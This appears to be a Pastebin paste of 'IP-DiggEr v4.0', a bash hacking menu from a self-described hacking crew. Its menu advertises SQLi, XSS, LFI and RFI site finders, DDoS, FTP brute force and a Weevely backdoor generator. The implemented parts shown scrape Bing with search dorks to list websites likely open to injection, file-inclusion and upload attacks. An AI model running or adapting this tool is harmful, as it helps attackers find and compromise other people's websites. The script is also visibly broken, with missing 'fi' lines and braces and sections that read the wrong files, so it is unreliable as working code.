Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- clear
- echo
- echo -e "\e[1;32m _-| -------------------------------------------------------------------------------------------------------------- _-| \e[0m"
- echo
- echo -e "\e[1;33m
- ____ ____ ____ ____ ___ ___ ____ ____ _ _ __ ___
- (_ _)( _ \ ___ ( _ \(_ _)/ __) / __)( ___)( _ \ ( \/ ) /. | / _ \
- _)(_ )___/ (___) )(_) )_)(_( (_-.( (_-. )__) ) / \ / (_ _) ( (_) )
- (____)(__) (____/(____)\___/ \___/(____)(_)\_) \/ (_) () \___/
- echo
- echo -e " \e[1;31m [+] Project Name :- \e[1;37m IP-DiggEr v4.0 The Next Level "
- echo -e "\e[1;31m [+] Coded by :- \e[1;37m Manoj Nath and Gurender Singh"
- echo -e "\e[1;31m [+] Version :- \e[1;37m IP-DiggEr v4.0"
- echo -e "\e[1;31m [+] Report Bugs to :- \e[1;33m [email protected]"
- echo -e "\e[1;31m [+] Like Us on Facebook :- \e[1;35m https://www.facebook.com/FreakCoderz "
- echo -e "\e[1;31m [+] Follow Us on Twitter :-\e[1;35m https://twitter.com/FreakCoderz "
- echo
- echo
- echo -e "\e[1;32m _-| -------------------------------------------------------------------------------------------------------------- _-| \e[0m"
- echo
- read -p " Press Enter To Cont. :- "
- echo
- while [ 1 ]; do
- echo
- echo -e "\e[1;31m <^> INDIAN\e[0m \e[1;32mHACKERS <^> \e[0m"
- echo
- echo -e "\e[1;34m PHP Server Based \e[0m"
- echo "--------------------------------------------"
- echo -e "1 - SQLI Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
- echo -e "2 - XSS Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
- echo -e "3 - LFI Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
- echo -e "4 - RFI Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
- echo -e "5 - Admin Panels \e[1;31m [+] Advance Search Mode Added \e[0m"
- echo -e "6 - Upload Vulnerability\e[1;31m [+] Advance Search Mode Added \e[0m"
- echo
- echo -e "\e[1;34m ASP Server Based \e[0m"
- echo "--------------------------------------------"
- echo -e "7 - ASP SQLI Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
- echo -e "8 - ASP XSS Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
- echo -e "9 - ASP Admin Panels \e[1;31m [+] Advance Search Mode Added \e[0m"
- echo -e "10 - ASP Upload Vulnerability\e[1;31m [+] Advance Search Mode Added \e[0m"
- echo
- echo -e "\e[1;34m Website Related Tools \e[0m"
- echo "--------------------------------------------"
- echo "11 - Wordpress Website Finder"
- echo "12 - Joomla Website Finder"
- echo -e "13 - Sub Domain Scanner \e[1;32m [+] New Feature Added \e[0m "
- echo -e "14 - Web Terminator ( DDos Attack ) \e[1;32m [+] New Feature Added \e[0m"
- echo -e "15 - IP Resolver \e[1;32m [+] New Feature Added \e[0m"
- echo -e "16 - NS Lookup \e[1;32m [+] New Feature Added \e[0m"
- echo -e "17 - FTP Brute Force \e[1;31m[+] New Feature Added \e[0m"
- echo -e "18 - Admin Panel Finder \e[1;31m[+] New Feature Added \e[0m"
- echo
- echo -e "\e[1;34m Website Vulnerability Scanning To0ls \e[0m"
- echo "--------------------------------------------"
- echo -e "19 - Joomla Vulnerability Scanner \e[1;31m [+] New Feature Added \e[0m"
- echo -e "20 - Wordpress Vulnerability Scanner \e[1;31m[+] New Feature Added \e[0m"
- echo -e "21 - UniScan -> Web Vulnerability Scanner \e[1;31m[+] New Feature Added \e[0m"
- echo "--------------------------------------------"
- echo -e "22 - Uploaded Shell Finder ( Website ) \e[1;31m [+] New Feature Added \e[0m"
- echo "--------------------------------------------"
- echo
- echo -e "\e[1;34m Web-Backd0or ( Weevely ) \e[0m"
- echo "--------------------------------------------"
- echo -e "23 - Web Backd0or Generator ( Weevely )"
- echo -e "24 - Web Backd0or Server Connect0r ( Weevely )"
- echo
- echo -e "\e[1;34m Other Hacking To0lKit \e[0m"
- echo "--------------------------------------------"
- echo -e "25 - W3bSploit T0olkit by 0x0ptim0us"
- echo "=============================================="
- echo -e "77 - BUgs LeeChers"
- echo -e "88 - \e[1;34mABout Un_N0n \e[0m "
- echo -e "99 - ABout IP-DiggEr v 4 .0 "
- echo -e "100 - ABout Freak Coderz "
- echo
- echo -e "\e[1;32m <^>------------------------------------<^> \e[0m"
- read -p " Enter Your Choice : " mychoice
- echo
- if [ "$mychoice" = "1" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance SQLI Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;32m <^> --------- Advance SQL Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the SQLI Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding SQLI Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- SQLI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( SQLI Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+.php?id=&qs=n&pq=ip:$ipaddress+.php?id=&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O sql_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' sql_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' sql_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' sql_website_finder.php`
- cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" sql_website_finder.php | cut -d '"' -f 2 >> sql_vulnerable_websites.txt
- rm -f sql_website_finder.php
- let page=$page+1
- done
- cat sql_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> sqli_websites.txt
- number=0
- for line in `cat sqli_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d sqli_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l sql_vulnerable_websites.txt | sed 's/sql_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N SQLI Websites =)) \e[0m"
- rm -f many.txt;
- rm -f sqli_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in sql_vulnerable_websites.txt =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- #<!---- XSS Script ----!>
- if [ "$mychoice" = "2" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance XSS Vulnerable Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;32m <^> --------- Advance XSS Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the XSS Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding XSS Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- SQLI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( XSS Vulnerable Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+search.php?&qs=n&pq=ip:$ipaddress+search.php?&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O xss_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' xss_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' xss_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' xss_website_finder.php`
- cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" xss_website_finder.php | cut -d '"' -f 2 >> xss_vulnerable_websites.txt
- rm -f xss_website_finder.php
- let page=$page+1
- done
- cat xss_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> xss_websites.txt
- number=0
- for line in `cat sqli_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d xss_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l xss_vulnerable_websites.txt | sed 's/xss_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N XSS Websites =)) \e[0m"
- rm -f many.txt;
- rm -f xss_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in xss_vulnerable_websites.txt =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- #<!---- LFI Vulnerable Finder ----!>
- if [ "$mychoice" = "3" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance LFI Vulnerable Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;32m <^> --------- Advance LFI Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the LFI Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding LFI Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- SQLI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( LFI Vulnerable Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+.php?file&qs=n&pq=ip:$ipaddress+.php?file&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O lfi_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' lfi_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' lfi_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' lfi_website_finder.php`
- cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" lfi_website_finder.php | cut -d '"' -f 2 >> lfi_vulnerable_websites.txt
- rm -f lfi_website_finder.php
- let page=$page+1
- done
- cat lfi_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> lfi_websites.txt
- number=0
- for line in `cat lfi_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d lfi_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l lfi_vulnerable_websites.txt | sed 's/lfi_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N LFI Websites =)) \e[0m"
- rm -f many.txt;
- rm -f lfi_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in lfi_vulnerable_websites.txt =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- #<!---- RFI SCANNER ----!>
- if [ "$mychoice" = "4" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance RFI Vulnerable Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;32m <^> --------- Advance RFI Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the RFI Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding RFI Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- RFI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( RFI Vulnerable Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+.php?file&qs=n&pq=ip:$ipaddress+.php?file&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O rfi_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' rfi_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' rfi_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' rfi_website_finder.php`
- cat "rfi_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" rfi_website_finder.php | cut -d '"' -f 2 >> rfi_vulnerable_websites.txt
- rm -f rfi_website_finder.php
- let page=$page+1
- done
- cat rfi_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> rfi_websites.txt
- number=0
- for line in `cat rfi_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d rfi_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l rfi_vulnerable_websites.txt | sed 's/rfi_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N RFI Websites =)) \e[0m"
- rm -f many.txt;
- rm -f rfi_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in rfi_vulnerable_websites.txt =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- #<!---- Admin Panel ----!>
- if [ "$mychoice" = "5" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance Admin Panel Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;32m <^> --------- Advance Admin Panel Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the Admin Panels on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding Admin Panels B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- RFI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Admin PAnel Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+admin+login&qs=n&pq=ip:$ipaddress+admin+login&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O ap_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' ap_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' ap_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' ap_website_finder.php`
- cat "ap_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" ap_website_finder.php | cut -d '"' -f 2 >> ap_vulnerable_websites.txt
- rm -f ap_website_finder.php
- let page=$page+1
- done
- cat ap_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> ap_websites.txt
- number=0
- for line in `cat ap_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d ap_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l ap_vulnerable_websites.txt | sed 's/ap_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N Admin Panels =)) \e[0m"
- rm -f many.txt;
- rm -f ap_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in ap_vulnerable_websites.txt =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- #<!---- Upload Vulnerability ----!>
- if [ "$mychoice" = "6" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance Upload Vulnerability Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;32m <^> --------- Advance Upload Vulnerability Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the File Uploading Vulnerable Websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding File Uploading Vulnerable Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- UP Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( File Uploading )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+upload&qs=n&pq=ip:$ipaddress+upload&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O up_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' up_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' up_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' up_website_finder.php`
- cat "up_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" up_website_finder.php | cut -d '"' -f 2 >> up_vulnerable_websites.txt
- rm -f up_website_finder.php
- let page=$page+1
- done
- cat up_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> up_websites.txt
- number=0
- for line in `cat up_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d up_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l up_vulnerable_websites.txt | sed 's/up_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N File Upload Vulnerable Websites =)) \e[0m"
- rm -f many.txt;
- rm -f up_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in up_vulnerable_websites.txt =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- #<!--- About Freak Coderz ---!>
- if [ "$mychoice" = "100" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> \e[0m"
- echo -e " \e[1;32m About FreaK CoderZ \e[0m"
- echo " "
- echo -e " \e[1;32m <^> ---------------------------------- <^> \e[0m "
- echo -e " \e[1;32m Freak Coderz is a Hacking Crew founded by Manoj Nath aka Silent Hacker \e[0m "
- echo -e " \e[1;32m This is the first tool created by the Freak Coderz ( Manoj Nath ) For the Hackers to find the Vulnerable websites \e[0m "
- echo -e " \e[1;35m Warm Hugs to :- YasH Bhaiya , SOG , Haxor Hasnain , Gurender Singh and All Indian Hackers and Programmers =)) \e[0m "
- echo -e " Like our T0ol then like us on the Facebook :- https://www.facebook.com/FreakCoderz "
- echo -e " Catch Silent Hacker on the Facebook :- https://www.facebook.com/Sil3nt.H4x0r "
- echo -e " \e[1;31m We are :- Silent Hacker | Hind-Hacker | R0ot_InjecTor "
- read -p "Press Enter to Continue"
- #<!--- BUgs LeeChers ---!>
- if [ "$mychoice" = "77" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> \e[0m"
- echo -e " \e[1;32m BUgs LeeChers Section \e[0m"
- echo " "
- echo -e " \e[1;32m <^> ---------------------------------- <^> \e[0m "
- echo -e "\e[1;31m This Section is for the BUgs LeeChers who found bugs in our tool and reported it :)) "
- echo -e "\e[1;34m Previously reported bugs as follows :- \e[0m"
- echo -e "Haxor Hasnain reported - BUg in IP-DiggEr v1.0 about the Uncompiling of the Project which doesn't allow it to run on other PC's "
- echo
- echo -e "Ahmed Reported - BuG how to run the C file i.e IP-Digger.sh.x.c by using gcc method :) "
- echo -e "\e[1;31m Thanx to these Guys for reporting the BUgs and Report the BUgs freely :) "
- echo
- read -p "Press Enter to Continue :)"
- #<!--- ASP BASED SERVER ---!>
- if [ "$mychoice" = "7" ]; then
- echo -e " \e[1;34m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance ASP SQLI Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;34m <^> --------- Advance ASP SQL Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the SQLI Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding SQLI Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- SQLI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( SQLI Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+.asp?id=&qs=n&pq=ip:$ipaddress+.asp?id=&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O sql_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' sql_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' sql_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' sql_website_finder.php`
- cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" sql_website_finder.php | cut -d '"' -f 2 >> aspsql_vulnerable_websites.txt
- rm -f sql_website_finder.php
- let page=$page+1
- done
